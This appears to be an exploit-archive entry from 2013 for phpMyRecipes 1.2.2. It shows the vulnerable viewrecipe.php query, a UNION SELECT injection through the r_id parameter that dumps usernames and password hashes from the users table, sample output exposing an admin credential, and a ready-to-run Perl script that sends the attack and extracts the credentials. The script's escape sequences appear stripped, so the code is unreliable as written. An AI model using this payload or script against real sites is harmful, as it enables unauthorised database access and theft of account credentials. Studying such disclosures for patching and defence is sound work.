[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : phpMyRecipes 1.2.2 (viewrecipe.php, r_id param) - SQL Injection Vulnerability
# Published : 2013-02-21
# Author :
# Previous Title : Scripts Genie Domain Trader (catalog.php, id param) - SQL Injection Vulnerability
# Next Title : Transferable Remote v1.1 iPad iPhone - Multiple Vulnerabilities


#phpMyRecipes 1.2.2 SQL Injection Exploit
#By cr4wl3r http://bastardlabs.info
#Script: http://sourceforge.net/projects/php-myrecipes/files/
#Demo: http://bastardlabs.info/demo/phpMyRecipes.png
#Tested: Ubuntu Linux
#
# Bugs found in viewrecipe.php
#
#  $r_id = $_GET['r_id'];
#
#  if (! ($result = mysql_query("SELECT
# name,category,servings,ingredients,instructions,description,creator,editor,imagefile FROM recipes WHERE id=$r_id"))) {
#    dberror("viewrecipe.php", "Cannot select recipe");
#  }
#
# http://bastardlabs/[path]/recipes/viewrecipe.php?r_id=[SQLi]
# Example: http://bastardlabs/[path]/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users
#
#
# $ perl recipes.pl localhost /demo/
# [+] Please Wait ...
#
# [+] Getting Username and Password    [ ok ]
# [+] w00tw00t
# [+] Username | Password --> admin:mps4BNRRjh3po

#!/usr/bin/perl

use IO::Socket;

$host = $ARGV[0];
$path = $ARGV[1];

if (@ARGV < 2) { 

print qq(
+---------------------------------------------+
|   phpMyRecipes 1.2.2 SQL Injection Exploit  |
|                                             |
|            coded & exploited by cr4wl3r     |
|                 http://bastardlabs.info/    |
+---------------------------------------------+
                    -=[X]=-
   +---------------------------------------
    Usage :                                
                                           
    perl $0 <host> <path>                  
    ex : perl $0 127.0.0.1 /phpMyRecipes/  
                                           
   +---------------------------------------
);
}

$target = "http://".$host.$path."/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", 
PeerPort=>"80") || die "[-] Can't connect to Server   [ failed ]n";
print "[+] Please Wait ...n";
print $sock "GET $target HTTP/1.1n";
print $sock "Accept: */*n";
print $sock "User-Agent: BastardLabsn";
print $sock "Host: $hostn";
print $sock "Connection: closenn";
sleep 2;
while ($answer = <$sock>) {
if ($answer =~ /<B>(.*?)</B>/) {
print "n[+] Getting Username and Password    [ ok ]n";
sleep 1;
print "[+] w00tw00tn";
print "[+] Username | Password --> $1n";
exit();
}
}
print "[-] Exploit Failed !n";